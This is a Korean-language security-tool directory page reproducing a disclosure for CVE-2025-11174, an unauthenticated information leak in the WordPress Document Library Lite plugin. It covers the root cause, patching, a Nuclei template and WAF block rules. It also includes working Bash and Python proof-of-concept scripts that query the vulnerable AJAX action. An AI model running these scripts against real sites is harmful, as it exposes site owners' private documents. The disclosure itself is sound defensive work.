Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - 민감 정보 노출에 대한 인가 누락 | CVE-2025-11174 | Kitploit
도구/GitHubGitHub/snailsploit/cve-2025-11174
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - 민감 정보 노출에 대한 인가 누락 | CVE-2025-11174

저장소 보기
24개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-11174: Document Library Lite WordPress 플러그인의 인증되지 않은 정보 노출

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

키워드: CVE-2025-11174, Document Library Lite 취약점, 정보 노출, WordPress 보안, 인증되지 않은 AJAX 악용, WordPress 플러그인 취약점, CWE-862, WordPress 문서 플러그인 보안, 인증 우회, WordPress CVE 2025

목차

  • 개요
  • 취약점 세부 정보
  • 기술 분석
  • 공격 경로
개념 증명
  • 해결 가이드
  • 탐지
  • CVSS 점수
  • 참고 자료
  • 크레딧
  • 보안 연락처
  • 개요

    Document Library Lite WordPress 플러그인 정보 노출 취약점 (CVE-2025-11174) - WordPress 문서 라이브러리 플러그인에서 인증되지 않은 사용자가 민감한 문서 데이터에 접근할 수 있는 보안 결함입니다.

    WordPress Document Library Lite 플러그인에서 중요한 권한 우회 취약점이 발견되었습니다. 이 취약점을 통해 인증되지 않은 공격자가 적절한 인증 없이 민감한 문서 정보에 접근할 수 있습니다.

    발견자: Kai Aizen & Avraham Shemesh (SnailSploit)
    공개일: 2025년 11월 1일
    CVSS 점수: 5.3 (중간)
    CWE: CWE-862 - 누락된 권한 확인
    플러그인: Document Library Lite
    공급업체: Barn2 Plugins
    공격 유형: 인증되지 않은 정보 노출
    필요 권한: 없음 (인증되지 않은 공격)

    취약점 세부 정보

    설명

    WordPress용 Document Library Lite 플러그인은 버전 1.1.6 이하의 모든 버전에서 부적절한 권한 부여 취약점을 포함하고 있습니다. 이 플러그인은 dll_load_posts라는 인증되지 않은 AJAX 액션을 노출하며, 논스(nonce) 또는 권한 검사를 수행하지 않고 문서 데이터의 JSON 테이블을 반환합니다.

    영향

    이 취약점을 통해 인증되지 않은 공격자는 다음을 수행할 수 있습니다:

    • 권한 없이 문서 메타데이터에 접근
    • 제한되어야 하는 문서 목록 검색
    • 인증된 사용자만 볼 수 있어야 하는 문서 정보 확인
    • Document Library에 저장된 문서 열거

    참고: CVSS 점수 5.3(중간 심각도)은 제한된 정보 노출을 반영합니다. 이 취약점은 문서 데이터에 대한 인증되지 않은 접근을 허용하지만, 기밀성 영향은 낮음(Low)으로 평가되며 무결성 또는 가용성 영향은 없습니다.

    영향을 받는 버전

    • 취약: 모든 버전 ≤ 1.1.6
    • 패치됨: 버전 1.1.7 이상

    CVSS v3.1 점수

    root@kitploit:~
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    
    지표값
    공격 벡터네트워크 (AV:N)
    공격 복잡성낮음 (AC:L)
    필요 권한없음 (PR:N)
    사용자 상호작용없음 (UI:N)
    범위변경되지 않음 (S:U)
    기밀성낮음 (C:L)
    무결성없음 (I:N)
    가용성없음 (A:N)

    CVSS v3.1 세부 분석:

    • 공격 벡터 (AV): 네트워크 - 이 취약점은 네트워크를 통해 원격으로 악용될 수 있습니다.
    • 공격 복잡성 (AC): 낮음 - 악용을 위해 특별한 조건이 필요하지 않습니다.
    • 필요 권한 (PR): 없음 - 인증이나 권한이 필요하지 않습니다.
    • 사용자 상호작용 (UI): 없음 - 악용에 사용자 상호작용이 필요하지 않습니다.
    • 범위 (S): 변경되지 않음 - 취약점은 취약한 구성 요소에만 영향을 미칩니다.
    • 기밀성 영향 (C): 낮음 - 제한된 정보 노출
    • 무결성 영향 (I): 없음 - 무결성 영향 없음
    • 가용성 영향 (A): 없음 - 가용성 영향 없음

    기술 세부 정보

    취약점 근본 원인

    AJAX 액션 dll_load_posts는 적절한 인증 또는 권한 확인 없이 등록되었습니다:

    root@kitploit:~
    // 취약한 코드 패턴 (단순화됨)
    add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');
    

    wp_ajax_nopriv_ 접두사는 이 액션이 인증되지 않은 사용자에게 접근 가능함을 나타내며, 콜백 함수는 다음을 구현하지 않습니다:

    • 논스(nonce) 검증
    • 권한 검사
    • 사용자 인증 확인

    공격 경로

    root@kitploit:~
    POST /wp-admin/admin-ajax.php
    action=dll_load_posts
    

    이 취약점은 WordPress admin-ajax.php 엔드포인트를 통해 인증 없이 악용될 수 있습니다.

    개념 증명

    ⚠️ 교육 및 승인된 테스트 목적으로만 사용하세요

    Bash PoC

    root@kitploit:~
    #!/bin/bash
    # CVE-2025-11174 PoC
    
    TARGET_URL="$1"
    
    if [ -z "$TARGET_URL" ]; then
        echo "Usage: $0 <target_url>"
        echo "Example: $0 https://example.com"
        exit 1
    fi
    
    echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
    echo "[*] Target: $TARGET_URL"
    echo ""
    
    # Send request to vulnerable AJAX endpoint
    curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
      -H "Content-Type: application/x-www-form-urlencoded" \
      -d "action=dll_load_posts" \
      | python3 -m json.tool
    
    echo ""
    echo "[+] If you see document data above, the site is vulnerable!"
    

    Python PoC

    root@kitploit:~
    #!/usr/bin/env python3
    """
    CVE-2025-11174 - Document Library Lite Information Disclosure PoC
    For educational and authorized testing purposes only
    """
    
    import requests
    import sys
    import json
    
    def exploit(target_url):
        ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
        
        print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
        print(f"[*] Target: {target_url}")
        print(f"[*] AJAX Endpoint: {ajax_url}\n")
        
        data = {'action': 'dll_load_posts'}
        
        try:
            response = requests.post(ajax_url, data=data, timeout=10)
            
            if response.status_code == 200:
                print("[+] Request successful!\n")
                try:
                    json_data = response.json()
                    print("[+] Retrieved document data:")
                    print(json.dumps(json_data, indent=2))
                    print("\n[!] Site is VULNERABLE to CVE-2025-11174")
                except json.JSONDecodeError:
                    print("[-] No JSON response received")
                    print(f"Response: {response.text[:200]}")
            else:
                print(f"[-] Request failed with status code: {response.status_code}")
                
        except requests.RequestException as e:
            print(f"[-] Error: {e}")
    
    if __name__ == "__main__":
        if len(sys.argv) != 2:
            print(f"Usage: {sys.argv[0]} <target_url>")
            print(f"Example: {sys.argv[0]} https://example.com")
            sys.exit(1)
        
        target = sys.argv[1]
        exploit(target)
    

    해결 가이드

    사이트 관리자를 위한 조치

    즉시 필요한 조치:

    1. Document Library Lite를 1.1.7 이상으로 즉시 업데이트하세요.
    2. 사이트 접근 로그에서 action=dll_load_posts를 포함한 admin-ajax.php로의 의심스러운 POST 요청을 검토하세요.
    3. 즉시 업데이트할 수 없는 경우 플러그인을 일시적으로 비활성화하는 것을 고려하세요.

    업데이트 지침

    WordPress 관리자 페이지를 통해:

    1. WordPress 관리자에서 플러그인 > 설치된 플러그인으로 이동합니다.
    2. "Document Library Lite"를 찾습니다.
    3. 지금 업데이트를 클릭하여 버전 1.1.7 이상으로 업그레이드합니다.
    4. 업데이트가 성공했는지 확인합니다.

    WP-CLI 사용:

    root@kitploit:~
    wp plugin update document-library-lite
    

    플러그인 개발자를 위한 조치

    모든 AJAX 핸들러가 적절한 보안 제어를 구현하도록 하세요:

    root@kitploit:~
    // 적절한 AJAX 보안 예시
    add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');
    
    function dll_load_posts_callback() {
        // 논스(nonce) 검증
        if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
            wp_die('Invalid nonce');
        }
        
        // 권한 확인
        if (!current_user_can('read')) {
            wp_send_json_error('Insufficient permissions');
            wp_die();
        }
        
        // 안전한 코드 작성
    }
    

    탐지

    WordPress 플러그인 확인

    root@kitploit:~
    # 취약한 버전이 설치되어 있는지 확인
    wp plugin list | grep -i "document-library-lite"
    

    보안 스캐너 규칙

    Nuclei 템플릿:

    root@kitploit:~
    id: CVE-2025-11174
    
    info:
      name: Document Library Lite - Unauthenticated Information Disclosure
      author: security-research
      severity: medium
      description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
      reference:
        - https://github.com/[your-repo]/CVE-2025-11174
      tags: cve,cve2025,wordpress,wp-plugin,unauth
    
    requests:
      - method: POST
        path:
          - "{{BaseURL}}/wp-admin/admin-ajax.php"
        
        body: "action=dll_load_posts"
        
        matchers-condition: and
        matchers:
          - type: word
            words:
              - "data"
              - "recordsTotal"
            condition: and
          
          - type: status
            status:
              - 200
    

    웹 애플리케이션 방화벽 규칙

    ModSecurity 규칙:

    root@kitploit:~
    SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
        "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
        log,deny,status:403,msg:'CVE-2025-11174 Exploit Attempt'"
        SecRule ARGS:action "@streq dll_load_posts" "t:none"
    

    Nginx/OpenResty 규칙:

    root@kitploit:~
    if ($request_uri ~* "admin-ajax\.php") {
        if ($args ~* "action=dll_load_posts") {
            return 403;
        }
    }
    

    타임라인

    • 2025년 11월 1일 - 취약점 공개
    • 2025년 11월 1일 - CVE 레코드 발행
    • 2025년 11월 - 패치 릴리스 (버전 1.1.7)

    참고 자료

    • CVE-2025-11174 - CVE.org
    • GitHub Advisory Database
    • Wordfence Intelligence
    • WordPress Plugin Directory

    크레딧

    연구자:

    • Avraham Shemesh
    • Kai Aizen - SnailSploit

    공개 과정: 조정된 공개

    면책 조항

    이 정보는 보안 연구 및 방어 목적으로만 제공됩니다. 이 취약점을 악의적인 목적으로 악용하는 것은 불법이며 비윤리적입니다. 소유하지 않은 시스템을 테스트하기 전에 항상 적절한 권한을 얻으십시오.

    연락처

    이 취약점에 대한 질문이나 추가 정보가 필요하시면:

    • 이메일: [email protected]
    • 웹사이트: snailsploit.com
    • 조직: SnailSploit Security Research

    마지막 업데이트: 2025년 11월 2일


    📚 문서 및 저자

    이 프로젝트의 전체 보고서, 방법론 및 관련 연구는 다음에서 확인할 수 있습니다:

    https://snailsploit.com/security-research/cves/cve-2025-11174/

    Kai Aizen 작성 — 독립적인 공격적 보안 연구원.

    snailsploit.com · 연구 · 프레임워크 · GitHub · LinkedIn · ResearchGate · X/Twitter

    동일한 공격. 다른 기질.

    도구 다운로드